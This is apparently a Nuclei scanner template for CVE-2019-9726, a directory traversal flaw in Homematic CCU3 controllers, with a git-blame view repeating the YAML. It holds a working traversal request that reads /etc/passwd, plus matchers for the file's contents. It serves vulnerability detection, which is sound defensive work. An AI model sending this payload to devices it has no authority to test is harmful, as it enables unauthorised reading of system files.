nuclei-templates/cves/2019/CVE-2019-9726.yaml

id: CVE-2019-9726

info:
  name: Homematic CCU3 - Directory Traversal / Arbitrary File Read
  author: 0x_Akoko
  severity: high
  description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited
    by unauthenticated attackers with access to the web interface.
  reference:
    - https://atomic111.github.io/article/homematic-ccu3-fileread
    - https://www.cvedetails.com/cve/CVE-2019-9726
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9726
    cwe-id: CWE-22
  tags: cve,cve2019,homematic,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/.%00./.%00./etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "bin:.*:0:0:"
        condition: or

      - type: status
        status:
          - 200
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`id: CVE-2019-9726`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`info:`
Update CVE-2019-9726.yaml 2022-02-27 14:48:25 +00:00			`name: Homematic CCU3 - Directory Traversal / Arbitrary File Read`
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`author: 0x_Akoko`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited`
			`by unauthenticated attackers with access to the web interface.`
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`reference:`
			`- https://atomic111.github.io/article/homematic-ccu3-fileread`
			`- https://www.cvedetails.com/cve/CVE-2019-9726`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cve-id: CVE-2019-9726`
			`cwe-id: CWE-22`
Update and rename CVE-2019-9726.yaml to cves/2019/CVE-2019-9726.yaml 2022-02-27 14:46:53 +00:00			`tags: cve,cve2019,homematic,lfi`
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update and rename CVE-2019-9726.yaml to cves/2019/CVE-2019-9726.yaml 2022-02-27 14:46:53 +00:00			`- "{{BaseURL}}/.%00./.%00./etc/passwd"`

Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`matchers-condition: and`
			`matchers:`
Update and rename CVE-2019-9726.yaml to cves/2019/CVE-2019-9726.yaml 2022-02-27 14:46:53 +00:00			`- type: regex`
Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`part: body`
Update and rename CVE-2019-9726.yaml to cves/2019/CVE-2019-9726.yaml 2022-02-27 14:46:53 +00:00			`regex:`
			`- "root:.*:0:0:"`
			`- "bin:.*:0:0:"`
			`condition: or`

Create CVE-2019-9726.yaml 2022-02-25 00:08:03 +00:00			`- type: status`
			`status:`
			`- 200`